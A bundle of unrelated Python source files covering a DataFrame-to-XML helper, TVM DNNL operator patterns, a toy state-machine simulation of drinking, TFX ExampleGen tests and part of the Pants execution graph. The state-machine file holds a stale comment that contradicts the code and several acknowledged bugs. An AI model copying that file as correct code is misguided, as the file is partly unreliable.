    if (num_rows, num_cols) != df.shape:
        df = df.iloc[0:num_rows, 0: num_cols]
        slice = '.iloc[0:%s, 0:%s]' % (num_rows, num_cols)
    else:
        slice = ''
    slice = name + slice
    xml = '<array slice=\"%s\" rows=\"%s\" cols=\"%s\" format=\"\" type=\"\" max=\"0\" min=\"0\"/>\n' % \
          (slice, num_rows, num_cols)
    if (rows, cols) == (-1, -1):
        rows, cols = num_rows, num_cols
    rows = min(rows, MAXIMUM_ARRAY_SIZE)
    cols = min(min(cols, MAXIMUM_ARRAY_SIZE), num_cols)
    # need to precompute column bounds here before slicing!
    col_bounds = [None] * cols
    for col in range(cols):
        dtype = df.dtypes.iloc[col].kind
        if dtype in "biufc":
            cvalues = df.iloc[:, col]
            bounds = (cvalues.min(), cvalues.max())
        else:
            bounds = (0, 0)
        col_bounds[col] = bounds
    df = df.iloc[roffset: roffset + rows, coffset: coffset + cols]
    rows, cols = df.shape
    def default_format(type):
        # Map a dtype kind to a printf format: float -> .5f, int -> d,
        # everything else -> s.
        if type == 'f':
            return '.5f'
        elif type == 'i' or type == 'u':
            return 'd'
        else:
            return 's'
    xml += "<headerdata rows=\"%s\" cols=\"%s\">\n" % (rows, cols)
    format = format.replace('%', '')
    col_formats = []
    for col in range(cols):
        label = df.axes[1].values[col]
        if isinstance(label, tuple):
            label = '/'.join(label)
        label = str(label)
        dtype = df.dtypes.iloc[col].kind
        # The caller's format only applies to float columns; otherwise
        # fall back to the dtype default.
        fmt = format if (dtype == 'f' and format) else default_format(dtype)
        col_formats.append('%' + fmt)
        bounds = col_bounds[col]
        xml += '<colheader index=\"%s\" label=\"%s\" type=\"%s\" format=\"%s\" max=\"%s\" min=\"%s\" />\n' % \
               (str(col), label, dtype, fmt, bounds[1], bounds[0])
    for row, label in enumerate(iter(df.axes[0])):
        if isinstance(label, tuple):
            label = '/'.join(label)
        xml += "<rowheader index=\"%s\" label = \"%s\"/>\n" % \
               (str(row), label)
    xml += "</headerdata>\n"
    xml += "<arraydata rows=\"%s\" cols=\"%s\"/>\n" % (rows, cols)
    for row in range(rows):
        xml += "<row index=\"%s\"/>\n" % str(row)
        for col in range(cols):
            value = df.iat[row, col]
            value = col_formats[col] % value
            xml += var_to_xml(value, '')
    return xml
| |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-argument
"""DNNL library supported operators.
There are two ways to register a function for an op to indicate if it is
supported by DNNL.
- The first and simplest way is to use the helper so that
users only need to provide the operator name and a boolean value to indicate if
it is supported. For example:
.. code-block:: python
add = _register_external_op_helper("add")
add = _register_external_op_helper("add", True)
add = _register_external_op_helper("add", False)
- The other way is to implement the function by themselves to
check the attributes of the op and decide if it should be offloaded to DNNL.
"""
import logging
import tvm.ir
from tvm.relay import transform
from tvm.relay.build_module import bind_params_by_name
from ...dataflow_pattern import wildcard, is_op
from .register import register_pattern_table
logger = logging.getLogger("DNNL")
def _register_external_op_helper(op_name, supported=True):
    """The helper function to indicate that a given operator can be supported
    by DNNL.

    Fixes over the original docstring: "Paramters" typo and the
    undocumented ``supported`` parameter.

    Parameters
    ----------
    op_name : Str
        The name of operator that will be registered.
    supported : bool
        Whether the operator is supported by DNNL. Defaults to True.

    Returns
    -------
    f : callable
        A function that returns if the operator is supported by DNNL.
    """

    @tvm.ir.register_op_attr(op_name, "target.dnnl")
    def _func_wrapper(expr):
        return supported

    return _func_wrapper
# Operators DNNL supports unconditionally (no attribute inspection needed).
_register_external_op_helper("nn.batch_norm")
_register_external_op_helper("nn.conv2d")
_register_external_op_helper("nn.dense")
_register_external_op_helper("nn.relu")
_register_external_op_helper("tanh")
_register_external_op_helper("sigmoid")
_register_external_op_helper("add")
_register_external_op_helper("multiply")
def make_conv_pattern(with_bias=True, with_eltwise=None):
    """Create patterns related to nn.conv2d.

    Parameters
    ----------
    with_bias : bool
        Whether attach `bias_add` to `nn.conv2d`.
    with_eltwise : str
        The attached elementwise post-op name.

    Returns
    -------
    conv_out : CallPattern
        Call node sequence.
    """
    data, weight, bias = wildcard(), wildcard(), wildcard()
    conv_out = is_op("nn.conv2d")(data, weight)
    if with_bias:
        conv_out = is_op("add")(conv_out, bias)
    if with_eltwise:
        conv_out = is_op(with_eltwise)(conv_out)
    return conv_out
def make_dense_pattern(with_bias=True, with_eltwise=None):
    """Create patterns related to nn.dense.
    Parameters
    ----------
    with_bias : bool
        Whether attach `bias_add` to `nn.dense`.
    with_eltwise : str
        The attached elementwise post-op name.
    Returns
    -------
    dense_out : CallPattern
        Call node sequence.
    """
    # Base dense (fully-connected) op: any data with any weight.
    dense_node = is_op("nn.dense")(wildcard(), wildcard())
    # Optionally fold in the bias add.
    pattern = is_op("add")(dense_node, wildcard()) if with_bias else dense_node
    # Optionally append the elementwise post-op.
    if not with_eltwise:
        return pattern
    return is_op(with_eltwise)(pattern)
def make_dnnl_pattern(op, with_bias, with_eltwise):
    """Create dnnl patterns.
    Parameters
    ----------
    op : str
        The first call node's op name.
    with_bias : bool
        Whether attach `bias_add` to `nn.dense`.
    with_eltwise : str
        The attached elementwise post-op name.
    Returns
    -------
    pattern : Tuple(pattern_name, CallPattern)
        Created pattern name, along with its CallPattern.
    """
    # Build the pattern name from the op plus optional suffixes,
    # e.g. "dnnl.conv2d_bias_relu".
    name_parts = ["dnnl." + op]
    if with_bias:
        name_parts.append("_bias")
    if with_eltwise:
        name_parts.append("_" + with_eltwise.split(".")[-1])
    pat_name = "".join(name_parts)
    # Dispatch to the matching pattern builder.
    builders = {"conv2d": make_conv_pattern, "dense": make_dense_pattern}
    if op not in builders:
        logger.warning("Currently, only conv2d and dense op are supported, but got %s.", op)
        return ()
    return (pat_name, builders[op](with_bias, with_eltwise))
@register_pattern_table("dnnl")
def pattern_table():
    """Create dnnl patterns.
    Returns
    -------
    dnnl_patterns : List[dnnl_pattern]
        Created patterns.
    """
    elt_list = ["nn.relu", "tanh", "sigmoid", None]
    dnnl_patterns = []
    for with_bias in [True, False]:
        for elt in elt_list:
            if not with_bias and not elt:
                # A bare conv2d/dense (no bias, no post-op) is already covered
                # by the single-op registrations above.  Use `continue` rather
                # than the original early `return`, which only produced the
                # full pattern set because None happened to be the last entry
                # of elt_list.
                continue
            dnnl_patterns.append(make_dnnl_pattern("conv2d", with_bias, elt))
            dnnl_patterns.append(make_dnnl_pattern("dense", with_bias, elt))
    return dnnl_patterns
def partition_for_dnnl(mod, params=None):
    """Partition the graph greedily offloading supported operators to DNNL.
    Parameters
    ----------
    mod : Module
        The module to run passes on.
    params : Optional[Dict[str, NDArray]]
        Constant input parameters.
    Returns
    -------
    mod : Module
        Annotated and partitioned module.
    """
    if params:
        # Binding params as constants lets FoldConstant pre-compute weight-only
        # subexpressions before pattern matching.
        mod["main"] = bind_params_by_name(mod["main"], params)
    # Pass order matters: simplification/folding first so the composite
    # patterns (conv2d-bias-eltwise etc.) match their canonical shape, then
    # annotate and carve out the DNNL regions.
    seq = tvm.transform.Sequential(
        [
            transform.CanonicalizeOps(),
            transform.InferType(),
            transform.SimplifyInference(),
            transform.FoldConstant(),
            transform.FoldScaleAxis(),
            # fold consecutive add ops to simplify pattern `conv2d-bias_add-bn-relu`
            transform.SimplifyExpr(),
            transform.FoldConstant(),
            transform.MergeComposite(pattern_table()),
            transform.AnnotateTarget("dnnl"),
            transform.MergeCompilerRegions(),
            transform.PartitionGraph(),
        ]
    )
    with tvm.transform.PassContext(opt_level=3):
        mod = seq(mod)
    return mod
| |
# coding: utf-8
# # Modelling Finite State Machines.
# In this this program we code up a small world model in python. This model is called drinking in a bar. The rules are as follows:
# * You start sober.
# * If you are sober you take a drink
# * Once you take a drink, there are three possible scenarios.
# * If you are drunk and take a drink, there is 80% chance that you will stay drunk.
# * If you are drunk and take a drink, there is 20% chance that you will pass out.
# * If you are drunk and you do not drink, there is 50% chance that you will become sober
# * If you pass out, you don't drink.
#
from __future__ import print_function, division
import random
# Author's name.
# NOTE: the original assigned this to __name__, which clobbers the module's
# real name — breaking `if __name__ == "__main__"` checks, introspection and
# pickling.  __author__ is the conventional attribute for this metadata.
__author__ = "Tarun Chhabra"
def kv(d):
    """
    Render dict *d* as '(k1: v1,k2: v2,...)' with keys sorted,
    omitting keys that begin with an underscore (private entries).
    """
    public_items = ["%s: %s" % (key, d[key]) for key in sorted(d) if key[0] != "_"]
    return "(" + ",".join(public_items) + ")"
def shuffle(lst):
    """
    Shuffle *lst* in place (via random.shuffle) and return the same
    list object for call-chaining convenience.
    """
    random.shuffle(lst)
    return lst
## Function to get the random value between a lower and upper bound.
# Module-level alias for random.randint(a, b); both endpoints inclusive.
randint = random.randint
class O(object):
    """
    Minimal base object shared by every class in this module: stores
    arbitrary keyword arguments as attributes and renders them through
    kv() in __repr__.
    """
    def __init__(self, **kwargs):
        for key, value in kwargs.items():
            setattr(self, key, value)
    def __repr__(self):
        return self.__class__.__name__ + kv(self.__dict__)
# Greets using __name__, which the assignment above overwrote with the
# author's name — so this prints the author, not the module name.
print("Hello %s"%__name__)
class State(O):
    """
    State object.  Naming conventions carry semantics: a trailing "." marks
    a stop state, a leading "#" marks a state that is allowed to loop.
    """
    # Maximum arrivals allowed at a non-loop state before we assume the
    # machine is stuck in an unintended loop.
    visit_limit = 5
    def __init__(self, name):
        """
        Initialize a state.
        @param name: Name of the state
        @return: State object with
        name: Name of the state
        out: List of transitions
        visits: Number of times the state was visited if not declared as a loop
        """
        O.__init__(self, name=name, out=[], visits = 0)
    def is_stop(self):
        """
        Check if state is a stop state (name ends with ".")
        """
        return self.name[-1] == "."
    def is_loop(self):
        """
        Check if state is a possible loop state (name starts with "#")
        """
        return self.name[0] == "#"
    def arrive(self):
        """
        Move to the state if not a loop; enforce the visit limit.
        """
        if not self.is_loop():
            self.visits += 1
            # Raise explicitly instead of `assert`: assertions are stripped
            # when Python runs with -O, which would silently disable the
            # loop guard.  AssertionError is kept for backward compatibility.
            if self.visits > State.visit_limit:
                raise AssertionError("Loop Encountered")
    def next(self, record):
        """
        Move to next state from a list of possible transitions.
        NOTE: shuffles self.out in place, so transition order is randomized
        on every call; returns self when no guard fires.
        """
        for trans in shuffle(self.out):
            if trans.guard(record, trans):
                return trans.there
        return self
class Trans(O):
    # Transition Class: a directed, guarded edge of the state machine.
    def __init__(self, here, guard, there):
        """
        @param here: starting state
        @param guard: transfer function; called as guard(machine, trans) and
            returns True when the transition should be taken
        @param there: ending state
        """
        O.__init__(self, here = here, guard = guard, there = there)
class Machine(O):
    """
    A finite state machine: a label, a dict of named states, a current
    state, and a numeric data payload.
    """
    def __init__(self, label, data=0):
        """
        Create an instance of machine.
        @param label: Label representing the machine
        @param data: Data used to describe the machine. In this case you don't have any data
        """
        O.__init__(self, label = label, # Label of the machine
                   states = {}, # Possible state of the machine
                   here = None, # Current state of the machine
                   data = data) # Data used to describe the machine
    def add_state(self, name):
        """
        Create a State called *name*, register it, make it the current
        state if none is set yet, and return it.
        """
        state = State(name)
        self.states[name] = state
        if self.here is None:
            self.here = state
        return state
    def add_trans(self, *trans):
        """
        Append each given transition to its source ("here") state's out-list.
        """
        for each in trans:
            each.here.out.append(each)
    def step(self):
        """
        Advance one tick: unless already stopped, pick the next state and
        record the arrival.
        """
        if self.here.is_stop():
            return
        self.here = self.here.next(self)
        self.here.arrive()
class Factory(O):
    """
    Factory that generates machines.
    """
    def __init__(self):
        """
        Initialize the factory with an empty machine list.
        """
        O.__init__(self, machines = [])
    def make_machine(self, label, data=0):
        """
        Create a new machine, add it to the list "machines" and return it.
        """
        machine = Machine(label=label, data=data)
        self.machines.append(machine)
        return machine
    def run(self, seed=1, ticks=100):
        """
        Run all the machines for at most *ticks* rounds, stopping early once
        every machine has reached a stop state.
        @param seed: seed for the random number generator
        @param ticks: maximum number of scheduling rounds
        """
        print('Seed : ', seed)
        random.seed(seed)
        # `range`, not `xrange`: xrange does not exist on Python 3, and this
        # file already targets 2/3 compatibility via __future__ imports.
        for _ in range(ticks):
            alive = False
            for machine in shuffle(self.machines):
                if not machine.here.is_stop():
                    alive = True
                    machine.step()
                    self.report(machine.label)
                    break
            if not alive: break
    def report(self, name):
        """
        Report the runs.
        NOTE(review): lst is indexed by machine.data and incremented by
        machine.label; data can go negative (drunk decrements it) or exceed
        max_len, which wraps (negative) or raises IndexError — confirm intent.
        """
        max_len = 50
        lst = [0]*(max_len + 1)
        for machine in self.machines:
            lst[machine.data] += machine.label
            print (machine.here)
        show = lambda x: str(x if x else '.')
        print(name, " | ", " ".join(map(show, lst)))
# In[22]:
# Transition probabilities for the drinking state machine.
drunk_chance = 0.8    # chance of staying drunk after another drink
passout_chance = 0.2  # chance of passing out after another drink
sober_chance = 0.5    # chance of sobering up when not drinking
def drunk(m, t):
    """
    Transition guard for staying drunk (fires with probability drunk_chance).
    @param m: instance of Machine
    @param t: instance of Trans
    """
    # If chance < drunk_chance, reduce the machine's energy
    # by a random integer between [1, 5] and return True. Else return False
    if random.random() < drunk_chance:
        m.data -= randint(1,5)
        return True
    return False
def sober(m, t):
    """
    Transition guard for sobering up (fires with probability sober_chance).
    @param m: instance of Machine
    @param t: instance of Trans
    """
    # If chance < sober_chance, increase the machine's energy
    # by a random integer between [1, 5] and return True. Else return False
    if random.random() < sober_chance:
        m.data += randint(1,5)
        return True
    return False
def passout(m, t):
    """
    Transition guard for passing out: return True if chance < passout_chance.
    """
    return random.random() < passout_chance
def drink(m, t):
    """
    Transition guard for taking a drink: fires unconditionally.
    :param m: machine
    :param t: trans object
    :return: True always
    """
    return True
def notdrink(m,t):
    """Transition guard for skipping a drink: fires unconditionally."""
    return True
# In[23]:
def fsm(factory, label, data):
    """
    Build the drinking state machine on a new machine from *factory*.
    NOTE(review): the local names sober/drunk/passout shadow the probability
    guard functions defined above, and every transition uses the always-true
    guards drink/notdrink — so drunk_chance/sober_chance/passout_chance are
    never applied.  Confirm whether the transitions were meant to use the
    probabilistic guards instead.
    """
    m = factory.make_machine(label, data)
    # Using the functions and classes defined above code up the
    # state machine in the figure at the top of the page.
    sober = m.add_state("sober")        # plain state
    drunk = m.add_state("#drunk")       # "#" = loop state, exempt from visit limit
    passout = m.add_state("passout.")   # "." = stop state
    m.add_trans(Trans(sober,drink,drunk),
                Trans(drunk,drink,drunk),
                Trans(drunk,drink,passout),
                Trans(drunk,notdrink,sober),
                Trans(drunk,notdrink,drunk),)
    return m
# In[24]:
# Build three machines, each starting with data=25.
f = Factory()
fsm(f, 1, 25)
fsm(f, 2, 25)
fsm(f, 4, 25)
# NOTE(review): run's signature is run(seed=1, ticks=100), so this positional
# 100 sets the SEED and leaves ticks at its default — confirm intent.
f.run(100)
| |
# Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tfx.components.example_gen.base_example_gen_executor."""
import os
import apache_beam as beam
import tensorflow as tf
from tfx.components.example_gen import base_example_gen_executor
from tfx.dsl.io import fileio
from tfx.proto import example_gen_pb2
from tfx.types import artifact_utils
from tfx.types import standard_artifacts
from tfx.types import standard_component_specs
from tfx.utils import proto_utils
@beam.ptransform_fn
def _TestInputSourceToExamplePTransform(pipeline, exec_properties,
                                        split_pattern):
  """Generates deterministic mock examples for a given split pattern.

  Emits 6000/4000/2000 records for the 'single/*', 'train/*' and 'eval/*'
  patterns respectively.  When the 'has_empty' exec property is set
  (default True), every 10th record carries empty features.  Output is
  tf.train.Example, tf.train.SequenceExample ('sequence_example'), or the
  serialized bytes of either ('format_proto').
  """
  mock_examples = []
  size = 0
  if split_pattern == 'single/*':
    size = 6000
  elif split_pattern == 'train/*':
    size = 4000
  elif split_pattern == 'eval/*':
    size = 2000
  assert size != 0
  has_empty = exec_properties.get('has_empty', True)
  for i in range(size):
    feature = {}
    # Each feature is deliberately left empty on every 10th record to
    # exercise the executor's empty-feature handling.
    feature['i'] = tf.train.Feature(
    ) if i % 10 == 0 and has_empty else tf.train.Feature(
        int64_list=tf.train.Int64List(value=[i]))
    feature['f'] = tf.train.Feature(
    ) if i % 10 == 0 and has_empty else tf.train.Feature(
        float_list=tf.train.FloatList(value=[float(i)]))
    feature['s'] = tf.train.Feature(
    ) if i % 10 == 0 and has_empty else tf.train.Feature(
        bytes_list=tf.train.BytesList(value=[tf.compat.as_bytes(str(i))]))
    if exec_properties.get('sequence_example', False):
      feature_list = {}
      feature_list['list'] = tf.train.FeatureList(feature=[feature['s']])
      example_proto = tf.train.SequenceExample(
          context=tf.train.Features(feature=feature),
          feature_lists=tf.train.FeatureLists(feature_list=feature_list))
    else:
      example_proto = tf.train.Example(
          features=tf.train.Features(feature=feature))
    mock_examples.append(example_proto)
  result = pipeline | beam.Create(mock_examples)
  if exec_properties.get('format_proto', False):
    # Deterministic serialization keeps hash-based splitting reproducible.
    result |= beam.Map(lambda x: x.SerializeToString(deterministic=True))
  return result
class TestExampleGenExecutor(base_example_gen_executor.BaseExampleGenExecutor):
  """Executor under test, wired to the in-memory mock input PTransform."""

  def GetInputSourceToExamplePTransform(self):
    return _TestInputSourceToExamplePTransform
class BaseExampleGenExecutorTest(tf.test.TestCase):
  """Tests for BaseExampleGenExecutor split/partition behavior."""

  def setUp(self):
    super().setUp()
    self._output_data_dir = os.path.join(
        os.environ.get('TEST_UNDECLARED_OUTPUTS_DIR', self.get_temp_dir()),
        self._testMethodName)
    # Create output dict.
    self._examples = standard_artifacts.Examples()
    self._examples.uri = self._output_data_dir
    self._output_dict = {
        standard_component_specs.EXAMPLES_KEY: [self._examples]
    }
    self._train_output_file = os.path.join(self._examples.uri, 'Split-train',
                                           'data_tfrecord-00000-of-00001.gz')
    self._eval_output_file = os.path.join(self._examples.uri, 'Split-eval',
                                          'data_tfrecord-00000-of-00001.gz')
    # Create exec properties for output splits.
    self._exec_properties = {
        standard_component_specs.INPUT_CONFIG_KEY:
            proto_utils.proto_to_json(
                example_gen_pb2.Input(splits=[
                    example_gen_pb2.Input.Split(
                        name='single', pattern='single/*'),
                ])),
        standard_component_specs.OUTPUT_CONFIG_KEY:
            proto_utils.proto_to_json(
                example_gen_pb2.Output(
                    split_config=example_gen_pb2.SplitConfig(splits=[
                        example_gen_pb2.SplitConfig.Split(
                            name='train', hash_buckets=2),
                        example_gen_pb2.SplitConfig.Split(
                            name='eval', hash_buckets=1)
                    ])))
    }
  def _testDo(self):
    # Shared driver (leading underscore: not collected by the test runner);
    # runs the executor and checks the train/eval outputs exist with the
    # expected 2:1 size ratio.
    # Run executor.
    example_gen = TestExampleGenExecutor()
    example_gen.Do({}, self._output_dict, self._exec_properties)
    self.assertEqual(
        artifact_utils.encode_split_names(['train', 'eval']),
        self._examples.split_names)
    # Check example gen outputs.
    self.assertTrue(fileio.exists(self._train_output_file))
    self.assertTrue(fileio.exists(self._eval_output_file))
    # Output split ratio: train:eval=2:1.
    self.assertGreater(
        fileio.open(self._train_output_file).size(),
        fileio.open(self._eval_output_file).size())
  def testDoInputSplit(self):
    # Create exec properties for input split.
    self._exec_properties = {
        standard_component_specs.INPUT_CONFIG_KEY:
            proto_utils.proto_to_json(
                example_gen_pb2.Input(splits=[
                    example_gen_pb2.Input.Split(
                        name='train', pattern='train/*'),
                    example_gen_pb2.Input.Split(name='eval', pattern='eval/*')
                ])),
        standard_component_specs.OUTPUT_CONFIG_KEY:
            proto_utils.proto_to_json(example_gen_pb2.Output())
    }
    self._testDo()
  def testDoOutputSplit(self):
    self._testDo()
  def testDoOutputSplitWithProto(self):
    # Update exec properties.
    self._exec_properties['format_proto'] = True
    self._testDo()
  def testDoOutputSplitWithSequenceExample(self):
    # Update exec properties.
    self._exec_properties['sequence_example'] = True
    self._testDo()
  def _testFeatureBasedPartition(self, partition_feature_name):
    # Helper: rewrite the output config to split by the named feature.
    self._exec_properties[
        standard_component_specs.OUTPUT_CONFIG_KEY] = proto_utils.proto_to_json(
            example_gen_pb2.Output(
                split_config=example_gen_pb2.SplitConfig(
                    splits=[
                        example_gen_pb2.SplitConfig.Split(
                            name='train', hash_buckets=2),
                        example_gen_pb2.SplitConfig.Split(
                            name='eval', hash_buckets=1)
                    ],
                    partition_feature_name=partition_feature_name)))
  def testFeatureBasedPartition(self):
    # Update exec properties.
    self._testFeatureBasedPartition('i')
    self._exec_properties['has_empty'] = False
    self._testDo()
  def testFeatureBasedPartitionWithSequenceExample(self):
    # Update exec properties.
    self._testFeatureBasedPartition('i')
    self._exec_properties['has_empty'] = False
    self._exec_properties['sequence_example'] = True
    self._testDo()
  def testInvalidFeatureName(self):
    # Update exec properties.
    self._testFeatureBasedPartition('invalid')
    # Run executor.
    example_gen = TestExampleGenExecutor()
    with self.assertRaisesRegex(RuntimeError,
                                'Feature name `.*` does not exist.'):
      example_gen.Do({}, self._output_dict, self._exec_properties)
  def testEmptyFeature(self):
    # Update exec properties.
    self._testFeatureBasedPartition('i')
    # Run executor.
    example_gen = TestExampleGenExecutor()
    with self.assertRaisesRegex(
        RuntimeError, 'Partition feature does not contain any value.'):
      example_gen.Do({}, self._output_dict, self._exec_properties)
  def testInvalidFloatListFeature(self):
    # Update exec properties.
    self._testFeatureBasedPartition('f')
    self._exec_properties['has_empty'] = False
    # Run executor.
    example_gen = TestExampleGenExecutor()
    with self.assertRaisesRegex(
        RuntimeError,
        'Only `bytes_list` and `int64_list` features are supported for partition.'
    ):
      example_gen.Do({}, self._output_dict, self._exec_properties)
  def testInvalidFeatureBasedPartitionWithProtos(self):
    # Update exec properties.
    self._testFeatureBasedPartition('i')
    self._exec_properties['has_empty'] = False
    self._exec_properties['format_proto'] = True
    # Run executor.
    example_gen = TestExampleGenExecutor()
    with self.assertRaisesRegex(
        RuntimeError, 'Split by `partition_feature_name` is only supported '
        'for FORMAT_TF_EXAMPLE and FORMAT_TF_SEQUENCE_EXAMPLE payload format.'):
      example_gen.Do({}, self._output_dict, self._exec_properties)
# Standard TensorFlow test entry point.
if __name__ == '__main__':
  tf.test.main()
| |
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import queue
import sys
import threading
import traceback
from collections import defaultdict, deque
from heapq import heappop, heappush
from pants.base.worker_pool import Work
from pants.util.contextutil import Timer
class Job:
    """A unit of scheduling for the ExecutionGraph.
    The ExecutionGraph represents a DAG of dependent work. A Job is a node in the graph along with
    the keys of its dependent jobs.
    """
    def __init__(
        self,
        key,
        fn,
        dependencies,
        size=0,
        on_success=None,
        on_failure=None,
        run_asap=False,
        duration=None,
        options_scope=None,
        target=None,
    ):
        """
        :param key: Key used to reference and look up jobs
        :param fn callable: The work to perform
        :param dependencies: List of keys for dependent jobs
        :param size: Estimated job size used for prioritization
        :param on_success: Zero parameter callback to run if job completes successfully. Run on main
          thread.
        :param on_failure: Zero parameter callback to run if job fails. Run on main
          thread.
        :param run_asap: Boolean indicating whether or not to queue job immediately once unblocked.
        """
        self.key = key
        self.fn = fn
        self.dependencies = dependencies
        self.size = size
        self.on_success = on_success
        self.on_failure = on_failure
        self.run_asap = run_asap
        self.duration = duration
        self.options_scope = options_scope
        self.target = target
    def __call__(self):
        # A Job is directly callable: invoking it runs the underlying work.
        self.fn()
    def run_success_callback(self):
        if self.on_success:
            self.on_success()
    def run_failure_callback(self):
        if self.on_failure:
            self.on_failure()
# Job lifecycle states tracked by StatusTable.
UNSTARTED = "Unstarted"
QUEUED = "Queued"
SUCCESSFUL = "Successful"
FAILED = "Failed"
CANCELED = "Canceled"
RUNNING = "Running"
class StatusTable:
    """Tracks each job's lifecycle state plus its count of unmet dependencies."""
    DONE_STATES = {SUCCESSFUL, FAILED, CANCELED}
    def __init__(self, keys, pending_dependencies_count):
        """
        :param keys: Iterable of job keys to track (all start UNSTARTED).
        :param pending_dependencies_count: Dict of job key -> number of
          not-yet-successful dependencies.
        """
        self._statuses = {key: UNSTARTED for key in keys}
        self._pending_dependencies_count = pending_dependencies_count
    def mark_as(self, state, key):
        self._statuses[key] = state
    def mark_queued(self, key):
        self.mark_as(QUEUED, key)
    def unfinished_items(self):
        """Returns a list of (name, status) tuples, only including entries marked as unfinished."""
        return [(key, stat) for key, stat in self._statuses.items() if stat not in self.DONE_STATES]
    def failed_keys(self):
        return [key for key, stat in self._statuses.items() if stat == FAILED]
    def is_unstarted(self, key):
        # Compare with == rather than `is`: the states are plain strings, and
        # identity comparison only worked by accident of the constants never
        # being copied or reconstructed.
        return self._statuses.get(key) == UNSTARTED
    def mark_one_successful_dependency(self, key):
        self._pending_dependencies_count[key] -= 1
    def is_ready_to_submit(self, key):
        return self.is_unstarted(key) and self._pending_dependencies_count[key] == 0
    def are_all_done(self):
        return all(s in self.DONE_STATES for s in self._statuses.values())
    def has_failures(self):
        return any(stat == FAILED for stat in self._statuses.values())
class ExecutionFailure(Exception):
    """Raised when one or more work units fail during execution.

    Optionally wraps the originating exception, exposed via ``cause``.
    """
    def __init__(self, message, cause=None):
        full_message = f"{message}: {cause}" if cause else message
        super().__init__(full_message)
        self.cause = cause
class UnexecutableGraphError(Exception):
    """Base class for errors that make an ExecutionGraph impossible to run."""
    def __init__(self, msg):
        prefix = "Unexecutable graph"
        super().__init__(f"{prefix}: {msg}")
class NoRootJobError(UnexecutableGraphError):
    """Raised when no job is dependency-free, implying a dependency cycle."""
    def __init__(self):
        super().__init__(
            "All scheduled jobs have dependencies. There must be a circular dependency."
        )
class UnknownJobError(UnexecutableGraphError):
    """Raised when a job depends on keys that were never scheduled."""
    def __init__(self, undefined_dependencies):
        super().__init__(
            "Undefined dependencies {}".format(", ".join(map(repr, undefined_dependencies)))
        )
class JobExistsError(UnexecutableGraphError):
    """Raised when the same job key is scheduled more than once."""
    def __init__(self, key):
        super().__init__(f"Job already scheduled {key!r}")
class ThreadSafeCounter:
    """An integer counter whose reads and writes are guarded by a lock."""
    def __init__(self):
        self.lock = threading.Lock()
        self._counter = 0
    def get(self):
        """Return the current value."""
        with self.lock:
            return self._counter
    def increment(self):
        """Add one to the counter."""
        self._adjust(1)
    def decrement(self):
        """Subtract one from the counter."""
        self._adjust(-1)
    def _adjust(self, delta):
        # Single locked mutation shared by increment/decrement.
        with self.lock:
            self._counter += delta
class ExecutionGraph:
    """A directed acyclic graph of work to execute.
    This is currently only used within jvm compile, but the intent is to unify it with the future
    global execution graph.
    """
    def __init__(self, job_list, print_stack_trace):
        """
        :param job_list Job: list of Jobs to schedule and run.
        :param print_stack_trace: If True, failed jobs log their full traceback.
        :raises UnknownJobError: if a job depends on a key that was never scheduled.
        :raises NoRootJobError: if every job has dependencies (cycle).
        :raises JobExistsError: if a key is scheduled twice (via _schedule).
        """
        self._print_stack_trace = print_stack_trace
        self._dependencies = defaultdict(list)
        self._dependees = defaultdict(list)
        self._jobs = {}
        self._job_keys_as_scheduled = []
        self._job_keys_with_no_dependencies = []
        for job in job_list:
            self._schedule(job)
        unscheduled_dependencies = set(self._dependees.keys()) - set(self._job_keys_as_scheduled)
        if unscheduled_dependencies:
            raise UnknownJobError(unscheduled_dependencies)
        if len(self._job_keys_with_no_dependencies) == 0:
            raise NoRootJobError()
        self._job_priority = self._compute_job_priorities(job_list)
    def format_dependee_graph(self):
        """Render the key -> dependees mapping as a multi-line debug string."""
        def entry(key):
            dependees = self._dependees[key]
            if dependees:
                return "{} <- {{\n  {}\n}}".format(key, ",\n  ".join(dependees))
            else:
                return f"{key} <- {{}}"
        return "\n".join([entry(key) for key in self._job_keys_as_scheduled])
    def _schedule(self, job):
        """Record a job's key, dependency edges and (reverse) dependee edges."""
        key = job.key
        dependency_keys = job.dependencies
        self._job_keys_as_scheduled.append(key)
        if key in self._jobs:
            raise JobExistsError(key)
        self._jobs[key] = job
        if len(dependency_keys) == 0:
            self._job_keys_with_no_dependencies.append(key)
        self._dependencies[key] = dependency_keys
        for dependency_key in dependency_keys:
            self._dependees[dependency_key].append(key)
    def _compute_job_priorities(self, job_list):
        """Walks the dependency graph breadth-first, starting from the most dependent tasks, and
        computes the job priority as the sum of the jobs sizes along the critical path."""
        job_size = {job.key: job.size for job in job_list}
        job_priority = defaultdict(int)
        # Seed the walk with leaf jobs (nothing depends on them).
        bfs_queue = deque()
        for job in job_list:
            if len(self._dependees[job.key]) == 0:
                job_priority[job.key] = job_size[job.key]
                bfs_queue.append(job.key)
        satisfied_dependees_count = defaultdict(int)
        while len(bfs_queue) > 0:
            job_key = bfs_queue.popleft()
            for dependency_key in self._dependencies[job_key]:
                # A job's priority is its size plus the heaviest path through
                # any of its dependees (critical-path length).
                job_priority[dependency_key] = max(
                    job_priority[dependency_key], job_size[dependency_key] + job_priority[job_key]
                )
                satisfied_dependees_count[dependency_key] += 1
                if satisfied_dependees_count[dependency_key] == len(
                    self._dependees[dependency_key]
                ):
                    bfs_queue.append(dependency_key)
        # run_asap jobs outrank everything else.
        max_priority = max(job_priority.values())
        immediate_priority = max_priority + 1
        for job in job_list:
            if job.run_asap:
                job_priority[job.key] = immediate_priority
        return job_priority
    def execute(self, pool, log):
